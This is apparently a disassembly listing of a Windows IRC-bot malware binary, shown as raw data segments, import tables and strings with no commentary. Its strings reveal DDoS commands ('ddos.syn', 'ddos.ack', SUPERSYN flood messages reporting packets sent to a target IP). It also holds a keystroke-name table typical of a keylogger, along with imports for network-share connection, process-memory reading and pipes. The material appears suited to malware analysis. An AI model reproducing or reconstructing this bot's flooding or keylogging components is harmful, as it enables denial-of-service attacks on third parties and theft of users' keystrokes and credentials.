a___ db '...',0 ; DATA XREF: sub_41F885+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_41F885+7D�o
align 8
dword_424BE8 dd 0FFFFFFFFh, 41FC5Ch, 41FC60h ; DATA XREF: sub_41FB63+5�o
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTz db 'TZ',0 ; DATA XREF: sub_42094E+A�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_42105F+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_42105F+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_42105F+24�o
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_4219A9:loc_421A9E�o
align 10h
a1Inf db '1#INF',0 ; DATA XREF: sub_4219A9+D8�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: sub_4219A9+C7�o
align 10h
a1Snan db '1#SNAN',0 ; DATA XREF: sub_4219A9+AD�o
align 4
dword_424C88 dd 0FFFFFFFFh, 4223A1h, 4223A5h, 0FFFFFFFFh, 422410h, 422414h
; DATA XREF: sub_4221EA+5�o
dd 424DC4h
off_424CA4 dd offset loc_4227D2 ; DATA XREF: sub_4227AA+8�o
; sub_4227EE+2C�o ...
dd offset sub_4227C5
dd offset sub_4229E6
dd offset dword_424E10
off_424CB4 dd offset sub_42283C ; DATA XREF: sub_4227EE+3A�o
; sub_422858�o ...
dd offset sub_4227C5
dd offset loc_422A22
dword_424CC0 dd 0 ; DATA XREF: sub_4227EE+16�o
; sub_4228C0+16�o
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_422863+11�o
dd offset dword_424E5C
off_424CE0 dd offset sub_42294B ; DATA XREF: sub_422967�o
; sub_42298A+37�o ...
dd offset sub_4227C5
dd offset loc_422A04
aStringTooLong db 'string too long',0 ; DATA XREF: sub_42298A+11�o
dd offset dword_424EA0
off_424D00 dd offset loc_422AE7 ; DATA XREF: sub_422AD2�o
; _2:off_43C34C�o ...
dd offset dword_424ED0
off_424D08 dd offset loc_422B03 ; DATA XREF: sub_422B1F+8�o
; sub_422B5C+8�o ...
dd offset sub_422BBC
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_422BBC+7�o
align 8
dword_424D28 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_422BC9+E�o
dd 3, 19930520h, 2 dup(0)
dword_424D48 dd 0FFFFFFFFh, 422D7Ah, 422D7Eh, 0FFFFFFFFh, 422DF7h, 422DFBh
; DATA XREF: sub_422C78+5�o
dword_424D60 dd 0FFFFFFFFh, 422FEFh, 422FF3h, 0FFFFFFFFh, 42304Ch, 423050h
; DATA XREF: sub_422F03+5�o
dd 43C34Ch, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_424D90 dd offset off_43C364 ; DATA XREF: _1:00424DA8�o _1:00424DF4�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_424D90
dd offset dword_424D60+18h
dword_424DB0 dd 3 dup(0) ; DATA XREF: _1:00424DD4�o
dd 2, 424DA8h, 3 dup(0)
dd offset off_43C364
dd offset dword_424DB0+4
off_424DD8 dd offset off_43C384 ; DATA XREF: _1:00424DF0�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_424DD8
dd offset off_424D90
dd offset dword_424D60+18h
dword_424DFC dd 3 dup(0) ; DATA XREF: _1:00424E20�o
dd 3, 424DF0h
dword_424E10 dd 3 dup(0) ; DATA XREF: _1:00424CB0�o
dd offset off_43C384
dd offset dword_424DFC+4
; ---------------------------------------------------------------------------
loc_424E24: ; DATA XREF: _1:00424E3C�o
movsb
retn
; ---------------------------------------------------------------------------
dw 43h
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset loc_424E24
dd offset off_424D90
dd offset dword_424D60+18h
dd 3 dup(0)
dd 3, 424E3Ch
dword_424E5C dd 3 dup(0) ; DATA XREF: _1:00424CDC�o
; ---------------------------------------------------------------------------
movsb
retn
; ---------------------------------------------------------------------------
inc ebx
add [esi+ecx*2+42h], cl
loc_424E6F: ; DATA XREF: _1:00424E88�o
add al, cl
retn
; ---------------------------------------------------------------------------
dw 43h
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset loc_424E6F+1
dword_424E8C dd 3 dup(0) ; DATA XREF: _1:00424EB0�o
dd 1, 424E88h
dword_424EA0 dd 3 dup(0) ; DATA XREF: _1:00424CFC�o
dd offset off_43C3C8
dd offset dword_424E8C+4
dd offset dword_424D60+18h
dword_424EB8 dd 4 dup(0) ; DATA XREF: _1:00424EE0�o
dd 1, 424EB4h
dword_424ED0 dd 3 dup(0) ; DATA XREF: _1:00424D04�o
dd offset off_43C34C
dd offset dword_424EB8+8
align 8
dword_424EE8 dd 19930520h, 2, 424F08h, 5 dup(0) ; DATA XREF: _0:loc_4230E7�o
dd 0FFFFFFFFh, 4230D0h, 0
dd offset sub_4230C8
dword_424F18 dd 19930520h, 2, 424F38h, 5 dup(0) ; DATA XREF: _0:loc_423104�o
dd 0FFFFFFFFh, 4230F4h, 0
dd offset loc_4230FC
dword_424F48 dd 19930520h, 2, 424F68h, 1, 424F78h, 3 dup(0) ; DATA XREF: _0:loc_423110�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 424F90h, 4 dup(0)
dd offset loc_40477E
dd 0FFFFFFFFh, 42311Ah
dword_424FA8 dd 19930520h, 1, 424FA0h, 5 dup(0) ; DATA XREF: _0:loc_423122�o
dd offset off_43C34C
align 10h
dd 0FFFFFFFFh, 0
dd 0Ch, 422B5Ch, 0
dd offset off_43C364
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 422908h, 0
dd offset off_43C384
align 8
dd 0FFFFFFFFh, 0
dword_425010 dd 1Ch, 422972h, 3, 424FFCh, 424FE0h, 424FC4h ; DATA XREF: _1:00425034�o
dword_425028 dd 0 ; DATA XREF: sub_422863+2E�o
; sub_4229E6+4B�o
dd offset sub_422858
dd 0
dd offset dword_425010+8
dd 0FFFFFFFFh, 42312Ch
dword_425040 dd 19930520h, 1, 425038h, 4 dup(0) ; DATA XREF: _0:loc_423134�o
dd 0FFFFFFFFh, 42313Eh
dword_425064 dd 19930520h, 1, 42505Ch, 4 dup(0) ; DATA XREF: _0:loc_423146�o
dd 0FFFFFFFFh, 423150h
dword_425088 dd 19930520h, 1, 425080h, 5 dup(0) ; DATA XREF: _0:loc_423158�o
; ---------------------------------------------------------------------------
movsb
retn
; ---------------------------------------------------------------------------
dw 43h
align 10h
dd 0FFFFFFFFh, 0
dword_4250B8 dd 1Ch, 4229CEh, 3, 4250A4h, 424FE0h, 424FC4h ; DATA XREF: _1:004250DC�o
dword_4250D0 dd 0 ; DATA XREF: sub_42298A+2E�o
; sub_4229E6+2D�o
dd offset sub_422967
dd 0
dd offset dword_4250B8+8
dd 0FFFFFFFFh, 423162h
dword_4250E8 dd 19930520h, 1, 4250E0h, 4 dup(0) ; DATA XREF: _0:loc_42316A�o
dword_425104 dd 2, 424FE0h, 424FC4h ; DATA XREF: _1:0042511C�o
dword_425110 dd 0 ; DATA XREF: sub_4229E6+F�o
dd offset sub_4227AA
dd 0
dd offset dword_425104
dd 25348h, 0FFFFFFFEh, 0
dd 253B2h, 241D8h, 25350h, 0FFFFFFFEh, 0
dd 253BAh, 241E0h, 25170h, 0FFFFFFFEh, 0
dd 25C2Eh, 24000h, 5 dup(0)
dd 2573Ah, 25C14h, 25C02h, 25BF0h, 25BE0h, 25BD0h, 25BC0h
dd 25BA2h, 25B8Eh, 25B7Eh, 25B6Ch, 25B5Ah, 25B4Ch, 25B3Ch
dd 25B2Ah, 25B10h, 25AF8h, 25ADEh, 25AC4h, 25AA8h, 25A9Ch
dd 253C6h, 253D4h, 253E4h, 253FEh, 2541Ah, 25422h, 25438h
dd 25448h, 2545Eh, 2546Ah, 25478h, 25484h, 25498h, 254A6h
dd 254BCh, 254CCh, 254DCh, 254F2h, 25504h, 25516h, 25526h
dd 25534h, 2554Ah, 25556h, 2556Eh, 25588h, 25598h, 255AAh
dd 255BCh, 255D4h, 255ECh, 25614h, 2562Ch, 2563Ah, 25654h
dd 25666h, 25676h, 25682h, 2568Eh, 256A0h, 256B2h, 256C6h
dd 256D6h, 256E4h, 256F8h, 2570Ah, 2571Ah, 25728h, 2574Ah
dd 25760h, 2576Eh, 2577Ch, 2578Eh, 257AAh, 257C0h, 257D0h
dd 257E6h, 257F6h, 25808h, 2581Ch, 2582Ah, 2583Ah, 25850h
dd 2585Eh, 25874h, 25888h, 25896h, 258ACh, 258B8h, 258C8h
dd 258DAh, 258E6h, 258FAh, 25912h, 25924h, 25938h, 25952h
dd 2596Eh, 2597Ah, 25994h, 259A4h, 259B2h, 259C4h, 259D6h
dd 259E4h, 259FEh, 25A0Ch, 25A1Ah, 25A28h, 25A38h, 25A48h
dd 25A5Ah, 25A66h, 25A76h, 25A86h, 25A92h, 0
dd 2539Ch, 0
dd 80000073h, 80000015h, 80000002h, 8000000Dh, 80000001h
dd 80000016h, 80000034h, 8000000Bh, 80000074h, 80000010h
dd 80000013h, 80000012h, 80000097h, 80000017h, 8000000Ah
dd 80000004h, 80000003h, 80000009h, 0
db 6
align 2
aWnetaddconne_1 db 'WNetAddConnection2A',0
aMpr_dll_0 db 'MPR.dll',0
aWs2_32_dll_0 db 'WS2_32.dll',0
align 2
db '',0
aExitthread db 'ExitThread',0
align 4
db 0DFh ;
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 0A3h ;
db 2, 51h, 75h
aEryperformance db 'eryPerformanceCounter',0
dw 2A4h
aQueryperform_1 db 'QueryPerformanceFrequency',0
dw 356h
aSleep_0 db 'Sleep',0
dw 1C1h
aGetsystemdirec db 'GetSystemDirectoryA',0
db 73h ; s
db 1, 47h, 65h
aTlocaltime db 'tLocalTime',0
align 4
db 75h ; u
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 2B5h
aReadfile_0 db 'ReadFile',0
align 2
a4 db '4',0
aClosehandle_0 db 'CloseHandle',0
db 0A4h ;
db 3, 57h, 72h
aItefile db 'iteFile',0
db 68h ; h
db 3, 54h, 72h
aAnsactnamedpip db 'ansactNamedPipe',0
aS_1 db 'S',0
aCreatefilea_0 db 'CreateFileA',0
db 90h
db 3
aWaitforsingl_0 db 'WaitForSingleObject',0
db 71h ; q
db 1, 47h, 65h
aTlasterror db 'tLastError',0
align 4
aO db 'O',0
aCreateeventa db 'CreateEventA',0
align 4
db 7Dh ; }
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 1E0h
aGettimeformata db 'GetTimeFormatA',0
align 4
db 47h ; G
db 1, 47h, 65h
aTdateformata db 'tDateFormatA',0
align 2
aO_0 db 'o',0
aCreatethread_0 db 'CreateThread',0
align 2
dw 163h
aGetfilesize_0 db 'GetFileSize',0
db 5Eh ; ^
db 1, 47h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
db '',0
aFindclose_0 db 'FindClose',0
db '',0
aFiletimetosyst db 'FileTimeToSystemTime',0
align 2
db '',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
db '',0
aFindnextfile_0 db 'FindNextFileA',0
db '',0
aFindfirstfil_0 db 'FindFirstFileA',0
align 2
dw 31Bh
aSetfilepoint_0 db 'SetFilePointer',0
align 4
db 51h ; Q
db 2, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 4
aS_2 db '',0
aEntercritica_0 db 'EnterCriticalSection',0
align 4
db 24h ; $
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSectionAndSpinCount',0
aB db '',0
aDeletecritic_0 db 'DeleteCriticalSection',0
dd 724600F8h, 694C6565h, 72617262h, 1590079h
aGetenvironme_0 db 'GetEnvironmentVariableW',0
dd 654701A0h, 6F725074h, 64644163h, 73736572h, 2520000h
dd 64616F4Ch, 7262694Ch, 41797261h, 2160000h, 70616548h
dd 65657246h, 2100000h, 70616548h, 6F6C6C41h, 1A30063h
dd 50746547h, 65636F72h, 65487373h, 7061h, 69560389h, 61757472h
dd 6575516Ch, 78457972h, 2B80000h
aReadprocessmem db 'ReadProcessMemory',0
dw 1C5h
aGetsysteminfo db 'GetSystemInfo',0
dw 286h
aOpenprocess_0 db 'OpenProcess',0
dd 6547017Fh, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6F4600F3h
dd 74616D72h, 7373654Dh, 41656761h, 20A0000h, 626F6C47h
dd 6E556C61h, 6B636F6Ch, 2030000h, 626F6C47h, 6F4C6C61h
dd 6B63h, 6E550371h, 5670616Dh, 4F776569h, 6C694666h, 2680065h
dd 5670614Dh, 4F776569h, 6C694666h, 540065h
aCreatefilema_1 db 'CreateFileMappingA',0
align 10h
dd 6553031Fh, 6C694674h, 6D695465h, 1650065h, 46746547h
dd 54656C69h, 656D69h, 72430066h, 65746165h, 636F7250h
dd 41737365h, 0BC0000h
aExpandenvironm db 'ExpandEnvironmentStringsA',0
dw 319h
aSetfileattribu db 'SetFileAttributesA',0
align 10h
db 0D5h ;
db 1, 47h, 65h
aTtemppatha db 'tTempPathA',0
align 10h
db 5Ah ; Z
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
dw 291h
aPeeknamedpipe db 'PeekNamedPipe',0
aU db '',0
aDuplicatehandl db 'DuplicateHandle',0
db 42h ; B
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
aE db 'e',0
aCreatepipe db 'CreatePipe',0
align 2
dw 1E9h
aGetversionex_0 db 'GetVersionExA',0
dw 204h
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 10h
db '',0
aExitprocess_0 db 'ExitProcess',0
dw 394h
aWidechartomu_0 db 'WideCharToMultiByte',0
dd 65470114h, 6D6F4374h, 65747570h, 6D614E72h, 4165h, 65440083h
dd 6574656Ch, 656C6946h, 1430041h
aGetcurrentpr_1 db 'GetCurrentProcessId',0
aC db 'C',0
aCopyfilea db 'CopyFileA',0
db '`',0
aCreatemutexa db 'CreateMutexA',0
align 4
dd 6554035Fh, 6E696D72h, 54657461h, 61657268h, 26E0064h
dd 65766F4Dh, 656C6946h, 35E0041h, 6D726554h, 74616E69h
dd 6F725065h, 73736563h, 2EE0000h
aSetconsolectrl db 'SetConsoleCtrlHandler',0
dw 174h
aGetlocaleinfoa db 'GetLocaleInfoA',0
align 4
db 78h ; x
db 1, 47h, 65h
aTlogicaldrives db 'tLogicalDrives',0
align 4
db 8Eh ;
db 3, 57h, 61h
aItformultipleo db 'itForMultipleObjects',0
align 2
dw 0FCh
aGenerateconsol db 'GenerateConsoleCtrlEvent',0
align 2
dw 2D7h
aRtlunwind db 'RtlUnwind',0
dw 1E2h
aGettimezoneinf db 'GetTimeZoneInformation',0
align 4
db 0C8h ;
db 1, 47h, 65h
aTsystemtime db 'tSystemTime',0
db 1Ah
db 2, 48h, 65h
aAprealloc db 'apReAlloc',0
dw 1B7h
aGetstartupinfo db 'GetStartupInfoA',0
db 10h
db 1, 47h, 65h
aTcommandlinea db 'tCommandLineA',0
dw 1E8h
aGetversion db 'GetVersion',0
align 4
db 58h ; X
db 1, 47h, 65h
aTenvironmentva db 'tEnvironmentVariableA',0
dw 214h
aHeapdestroy db 'HeapDestroy',0
db 12h
db 2, 48h, 65h
aApcreate db 'apCreate',0
align 2
dw 383h
aVirtualfree_0 db 'VirtualFree',0
db 81h ;
db 3, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 4
db 36h ; 6
db 2, 49h, 73h
aBadwriteptr db 'BadWritePtr',0
db 0A7h ;
db 2, 52h, 61h
aIseexception db 'iseException',0
align 2
dw 21Ch
aHeapsize db 'HeapSize',0
align 2
dw 244h
aLcmapstringa db 'LCMapStringA',0
align 2
dw 245h
aLcmapstringw db 'LCMapStringW',0
align 2
dw 104h
aGetcpinfo db 'GetCPInfo',0
dw 0FDh
aGetacp db 'GetACP',0
align 4
db 93h ;
db 1, 47h, 65h
aToemcp db 'tOEMCP',0
align 4
db 6Eh ; n
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 4
db 0F6h ;
align 2
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 0F7h
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 55h ; U
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStrings',0
db 57h ; W
db 1, 47h, 65h
aTenvironment_0 db 'tEnvironmentStringsW',0
align 2
dw 324h
aSethandlecount db 'SetHandleCount',0
align 4
dd 654701B9h, 64745374h, 646E6148h, 656Ch, 65470166h, 6C694674h
dd 70795465h, 1BA0065h, 53746547h, 6E697274h, 70795467h
dd 4165h, 654701BDh, 72745374h, 54676E69h, 57657079h, 3370000h
dd 53746553h, 61486474h, 656C646Eh, 0EE0000h, 73756C46h
dd 6C694668h, 66754265h, 73726566h, 34A0000h
aSetunhandled_0 db 'SetUnhandledExceptionFilter',0
db 33h ; 3
db 2, 49h, 73h
aBadreadptr db 'BadReadPtr',0
align 10h
db 30h ; 0
db 2, 49h, 73h
aBadcodeptr db 'BadCodePtr',0
align 10h
db 10h
db 3, 53h, 65h
aTendoffile db 'tEndOfFile',0
align 10h
db ':',0
aComparestringa db 'CompareStringA',0
align 2
db ';',0
aComparestringw db 'CompareStringW',0
align 4
db 13h
db 3, 53h, 65h
aTenvironment_1 db 'tEnvironmentVariableA',0
aKernel32_dll_0 db 'KERNEL32.dll',0
db 0
_1 ends
; Section 3. (virtual address 00026000)
; Virtual size : 000656A0 ( 415392.)
; Section size in file : 000656A0 ( 415392.)
; Offset to raw data for section: 00026000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_2 segment para public 'CODE' use32
assume cs:_2
;org 426000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dword_426000 dd 0 ; DATA XREF: sub_419AB8+1F�o
dd offset sub_4030CC
dd offset sub_40482C
dd offset sub_40484E
dword_426010 dd 0 ; DATA XREF: sub_419AB8+1A�o
dword_426014 dd 0 ; DATA XREF: sub_419AB8+10�o
dd offset sub_418682
dd offset sub_41ECF1
dd offset sub_41FA42
dd offset sub_4208B4
dword_426028 dd 0 ; DATA XREF: sub_419AB8:loc_419AC3�o
dword_42602C dd 0 ; DATA XREF: sub_419B07+65�o
dd offset sub_41FAE7
dword_426034 dd 0 ; DATA XREF: sub_419B07:loc_419B67�o
dword_426038 dd 0 ; DATA XREF: sub_419B07+76�o
dd offset sub_4208C5
dword_426040 dd 4 dup(0) ; DATA XREF: sub_419B07:loc_419B78�o
unk_426050 db 2 ; DATA XREF: sub_401000+5E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 2 dup(64h), 6Fh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDoneWithFloodI db ' Done with flood (%iKB/sec).',0
align 4
unk_426088 db 2 ; DATA XREF: sub_4010B5+302�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 2 dup(64h), 6Fh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSendErrorD_ db ' Send error: <%d>.',0
align 4
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_4010B5:loc_4011E1�o
; sub_40EE72+268F�o
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_4010B5:loc_4011C5�o
; sub_40EE72+2678�o
align 10h
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_4010B5+F1�o
; sub_40EE72+2661�o
align 4
unk_4260DC db 2 ; DATA XREF: sub_40144A+397�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDoneWithSFlood db ' Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%d'
db 'MB).',0
align 4
unk_42613C db 2 ; DATA XREF: sub_40144A+307�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSendingPa db ' Error sending packets to IP: %s. Packets sent: %d. Returned: <%'
db 'd>.',0
align 4
unk_42619C db 2 ; DATA XREF: sub_40144A+12A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aInvalidTargetI db ' Invalid target IP.',0
align 4
unk_4261CC db 2 ; DATA XREF: sub_40144A+C2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSetsockop db ' Error: setsockopt() failed, returned: <%d>.',0
align 4
unk_426214 db 2 ; DATA XREF: sub_40144A:loc_401493�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSocketFai db ' Error: socket() failed, returned: <%d>.',0
align 4
aSupersynDoneWi db '[SUPERSYN]: Done with flood (%iKB/sec)',0 ; DATA XREF: sub_401831+4B�o
align 10h
dword_426280 dd 7A026E02h, 201F6D1Fh, 6E797328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_4019D7+4B�o
dd 2BBBB02h
aDoneWithFloo_0 db ' Done with flood (%iKB/sec).',0
align 4
dword_4262B8 dd 7A026E02h, 201F6D1Fh, 6E797328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401A76+27D�o
dd 2BBBB02h
aSendErrorD__0 db ' Send error: <%d>.',0
dword_4262E4 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401D82+4EB�o
dd 2BBBB02h
aDoneWithSFlo_0 db ' Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%d'
db 'MB).',0
align 4
dword_426344 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401D82+44F�o
dd 2BBBB02h
aErrorSending_0 db ' Error sending packets to IP: %s. Packets sent: %d. Returned: <%'
db 'd>.',0
align 4
aRandom db 'random',0 ; DATA XREF: sub_401D82+312�o
; sub_40EE72+2C3C�o ...
align 4
aAck db 'ack',0 ; DATA XREF: sub_401D82+2F2�o
; sub_40EE72+2C25�o
aSyn db 'syn',0 ; DATA XREF: sub_401D82+2D2�o
; sub_40EE72+2C0D�o
dword_4263B4 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401D82+15F�o
dd 2BBBB02h
aInvalidTarge_0 db ' Invalid target IP.',0
align 4
dword_4263E4 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401D82+EE�o
dd 2BBBB02h
aErrorSetsock_0 db ' Error: setsockopt() failed, returned: <%d>.',0
align 4
dword_42642C dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401D82+70�o
dd 2BBBB02h
aErrorSocketF_0 db ' Error: socket() failed, returned: <%d>.',0
align 10h
dw 8
unicode 0, <>,0
aB_0: ; DATA XREF: sub_4023A7:loc_40248A�o
unicode 0, <b>,0
dd 62000000h, 2 dup(0)
dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 61000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
